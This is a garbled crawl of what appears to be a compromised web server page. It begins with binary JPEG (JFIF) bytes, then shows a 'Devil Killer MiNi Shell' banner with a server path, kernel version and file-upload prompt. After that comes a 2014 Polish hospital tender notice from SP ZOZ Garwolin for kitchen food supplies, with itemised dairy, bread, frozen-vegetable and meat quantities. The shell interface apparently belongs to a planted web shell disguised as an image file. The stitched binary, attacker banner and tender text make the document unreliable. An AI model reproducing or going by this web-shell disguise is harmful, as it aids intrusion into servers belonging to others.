JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140604/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140604/120585-N-2014.html

<p class="kh_header"><b>Garwolin: Dostawa żywności na potrzeby kuchni 
SP ZOZ Garwolin</b><br>
<b>Numer ogłoszenia: 120585 - 2014; data zamieszczenia: 04.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Lubelska 50, 08-400 Garwolin, woj. mazowieckie, tel. 25 6844700 w.619; 684 37 08, faks 25 6844700 w.619; 684 37 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzozgarwolin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności na potrzeby kuchni 
SP ZOZ Garwolin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa artykułów spożywczych, przypraw, warzyw i owoców, mięs i wędlin, artykułów piekarniczych, nabiału, ryb wędzonych i mrożonych oraz tłuszczy roślinnych, serów, przetworów mlecznych i odżywek dla Kuchni Szpitala Samodzielnego Publicznego Zakładu Opieki Zdrowotnej w Garwolinie przy ul. Lubelskiej 50 w okresie 12 miesięcy.
2.Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:
Zadanie nr 1 - Nabiał;
Zadanie nr 2 - Pieczywo;
Zadanie nr 3 - Mrożonki;
Zadanie nr 4 - Mięso i wędliny;
Zadanie nr 5 - Warzywa i owoce;
Zadanie nr 6 - Artykuły spożywcze;
Zadanie nr 7 - Przyprawy;
Zadanie nr 8 - Ryby mrożone i wędzone;
Zadanie nr 9 - Tłuszcze roślinne, sery i przetwory mleczne oraz odżywki.
3.Części (zadania) nie mogą być dzielone przez Wykonawców, nie dopuszcza się składania ofert na poszczególne, wybrane pozycje z zadania. Oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone.
4.Szczegółowy asortyment, wymagania, ilości zawiera Formularz asortymentowo - cenowy stanowiący załącznik nr 1 do Specyfikacji Istotnych Warunków Zamówienia.
5.Oferta powinna obejmować kompletną (z punktu widzenia celu, któremu ma służyć) realizację zamówienia.
6.Zamawiający wymaga utrzymania stałości cen ofertowych przez cały okres trwania umowy - dotyczy zadania nr 1, 2, 3, 4, 6, 7, 8, 9. Natomiast odnośnie do zadanie nr 5 (warzywa i owoce) - wysokość cen każdorazowo ustalana będzie na podstawie przeciętnych notowań z Warszawskiego Rynku Rolno-Spożywczego BRONISZE z dnia roboczego bezpośrednio poprzedzającego dostawę. Do każdej faktury Wykonawca zobowiązany będzie do przedstawienia jako załącznika wydruku notowań cen w/w giełdy, na podstawie którego nastąpiło wyliczenie cen. 
7.Termin dostawy  dnia następnego po złożeniu zamówienia.
8.Wykonawca dostarczy zamawiane artykuły na własny koszt i ryzyko do Kuchni Szpitala w Garwolinie ul. Lubelska 50, przy zachowaniu odpowiednich reżimów sanitarnych, wymaganych dla przewozu żywności.
9.Do każdej dostawy (dotyczy mięsa, drobiu, jaj i nabiału) Wykonawca zobligowany będzie dostarczyć Zamawiającemu dokument HDI.
10.Każdy dostarczony produkt spożywczy musi być zaopatrzony w czytelne etykiety z opisem składu tegoż produktu, terminem spożycia i numerem partii.
11.Zamawiający dopuszcza możliwość, że waga oferowanych artykułów spożywczych i przypraw może wahać się w granicach +/-10%. Jednak w sytuacji gdy Wykonawca zaoferuje artykuł o większej dopuszczalnej wadze cena tego artykułu pozostanie adekwatna do wymaganej wagi określonej w formularzu asortymentowo-cenowym (dotyczy zadania nr 6 i 7).
12.Dostawy artykułów spożywczych, przypraw, warzyw i owoców, tłuszczy roślinnych, serów, przetworów mlecznych i odżywek, mięs i wędlin, artykułów piekarniczych, nabiału oraz ryb i produktów mrożonych odbywać się będą sukcesywnie, na podstawie zamówień składanych przez upoważnionych pracowników SP ZOZ Garwolin, określających rodzaje i ilości zamawianych artykułów.
13.Oferowany asortyment musi posiadać termin ważności do spożycia gwarantujący jego właściwe i racjonalne wykorzystanie.
14.Dopuszcza się zmiany cen następujących przypadkach:
obniżenia cen,
zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
zmian stawek celnych wprowadzonych decyzjami odnośnych władz,
obniżenia ceny jednostkowej asortymentu,
zmiany adresu siedziby Wykonawcy lub Zamawiającego, 
zmiany nazwy Wykonawcy,
zmiany osób reprezentujących strony,
zmiany przepisów prawnych mających wpływ na treść niniejszej umowy,
zmiany wielkości opakowań nie mających wpływu na przedmiotową ofertę.
15.Ceny podlegać będą przeliczeniu odpowiednio do zmian w oparciu o złożoną ofertę i ulegają zmianie z chwilą wejścia w życie stosownych przepisów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.54.21.00-0, 15.53.00.00-2, 15.81.00.00-9, 15.81.11.00-7, 15.81.14.00-0, 15.81.22.00-5, 15.33.11.70-9, 15.10.00.00-9, 15.11.20.00-6, 15.13.11.30-5, 15.13.13.10-1, 15.30.00.00-1, 15.80.00.00-6, 15.87.00.00-7, 15.87.12.00-6, 15.89.15.00-5, 15.22.10.00-3, 15.23.40.00-7, 15.41.22.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana przez Komisję Przetargową wg formuły spełnia nie spełnia, w oparciu o dokumenty oświadczenia przedłożone przez Wykonawcę zgodnie z wymaganiami Zamawiającego, określonymi w pkt. VI SIWZ na potwierdzenie warunków określonych powyżej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokument potwierdzający, że Wykonawca wdrożył i stosuje system HACCP</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Formularz asortymentowo-cenowy - załącznik nr 1 do SIWZ.
2.Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ.
3.Oświadczenie Wykonawcy o braku podstaw do wykluczenia - załącznik 3 do SIWZ.
4.Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.) albo informację o tym, że nie należy do grupy kapitałowej (wzór stanowi załącznik nr 4 do SIWZ).
5.Formularz OFERTA - załącznik nr 5 do SIWZ.
6.Parafowany na każdej stronie formularz umowy - załącznik nr 6 do SIWZ.
7.Wykaz podwykonawców - załącznik nr 7 do SIWZ.
8.Ewentualne pełnomocnictwo, jeśli uprawnienie do reprezentowania Wykonawcy nie wynika z innych dokumentów załączonych przez Wykonawcę.
9.W przypadku złożenia oferty przez kilka podmiotów występujących wspólnie (konsorcjum), należy złożyć pełnomocnictwo zawierające oświadczenia woli wszystkich członków konsorcjum, wskazujące na osobę umocowaną (np. lider, radca prawny, etc.) do reprezentowania przedsiębiorców w udziale w określonym postępowaniu o zamówienie publiczne i do ich podpisywania w jego imieniu umów. Dokument niniejszy winien wyliczać wszystkich Wykonawców wraz z ich podpisami. Oferta konsorcjum winna zawierać dokumenty, o których mowa w pkt. VI SIWZ każdego z członków konsorcjum osobno.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmiany cen następujących przypadkach:
obniżenia cen,
zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian,
zmian stawek celnych wprowadzonych decyzjami odnośnych władz,
obniżenia ceny jednostkowej asortymentu,
zmiany adresu siedziby Wykonawcy lub Zamawiającego, 
zmiany nazwy Wykonawcy,
zmiany osób reprezentujących strony,
zmiany przepisów prawnych mających wpływ na treść niniejszej umowy,
zmiany wielkości opakowań nie mających wpływu na przedmiotową ofertę.
Ceny podlegać będą przeliczeniu odpowiednio do zmian w oparciu o złożoną ofertę i ulegają zmianie z chwilą wejścia w życie stosownych przepisów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzozgarwolin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej w Garwolinie, ul. Lubelska 50, 08-400 Garwolin, I piętro, pok. 136.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej w Garwolinie, ul. Lubelska 50, 08-400 Garwolin, II piętro, Sekretariat Dyrekcji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Mleko spożywcze 2% folia	l	18 000	5 l
2Mleko spożywcze 2% karton	l	4 000	1 l
3Ser biały (klinek, pergamin)	kg	1300	
4Masło śmietankowe 	kg	1200	200g
5Śmietana 18% 	szt.	1 000	400g
6Śmietana 12% 	szt.	200	400g
7Serek waniliowy kubek 	szt.	900	200g
8Serek truskawkowy kubek 	szt.	800	200g.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.00.00-6, 15.54.21.00-0, 15.53.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1Chleb krojony 	szt	13000	0,5kg
2Chleb wieloziarnisty krojony 	szt	600	0,4kg
3Bułka długa krojona 	szt	12 000	0,4kg
4Bułka tarta	szt	450	0,50kg
5Bułeczki drożdżowe 	szt	3 500	
6Jagodzianki 	szt	600	
7Chałka	szt	100	
8Pączki	szt	700	
9Pączki liliputki	kg	30	luz
10Kuleczki serowe	kg	25	luz
11Makowiec	szt	50	luz
12Sernik	kg	20	luz
13Pączki z musem jabłkowym	kg	50	luz
14Piernik	kg	20	luz
15Bułki długie	szt	50	0,40kg
16Babki cytrynowe, czekoladowe, piaskowe	szt	80	luz
17Szarlotka	kg	20	luz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.81.11.00-7, 15.81.14.00-0, 15.81.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Brokuły mrożone	kg	800	2,5kg
2	Kalafior mrożony	kg	800	2,5kg
3	Szpinak mrożony liście	kg	50	2,5kg
4	Fasolka szparagowa mrożona	kg	200	2,5kg
5	Marchew mrożona kostka	kg	100	2,5kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Schab środkowy bez kości	kg	900	
2	Schab karkowy bez kości	kg	600	
3	Szynka surowa bez kości	kg	1 000	
4	Łopatka wieprzowa bez kości	kg	1 600	
5	Smalec	kg	30	200g
6	Udka drobiowe	kg	1 500	
7	Filet z kurczaka	kg	900	
8	Słonina	kg	20	
9	Paszteciki drobiowe	szt	100	100g
10	Przysmak  z indyka w galarecie	kg	100	
11	Porcje rosołowe paczkowane (korpusy)	kg	700	
12	Polędwica sopocka	kg	400	
13	Szynka wędzona	kg	400	
14	Kiełbasa szynkowa	kg	350	
15	Kiełbasa krakowska	kg	100	
16	Schab pieczony	kg	300	
17	Karczek pieczony	kg	200	
18	Baleron 	kg	100	
19	Kiełbasa mielonka typu tyrolska	kg	300	
20	Pieczeń typu wiedeńska	kg	130	
21	Parówki odtłuszczone	kg	400	
22	Pasztet drobiowy	kg	200	
23	Pasztetowa drobiowa	kg	150	
24	Biała kiełbasa drobiowa parzona	kg	100	
25	Polędwica drobiowa typu Fantazja	kg	250	
26	Filet drobiowy	kg	100	
27	Szynka drobiowa	kg	300	
28	Polędwica drobiowa 	kg	300	
29	Szynka z piersi indyka	kg	200	
30	Kiełbasa typu śląska/toruńska	kg	130	
31	Serdelki	kg	350	
32	Schab drobiowy w majeranku	kg	300	
33	Polędwica typu kurpiowska	kg	350.</p></li>
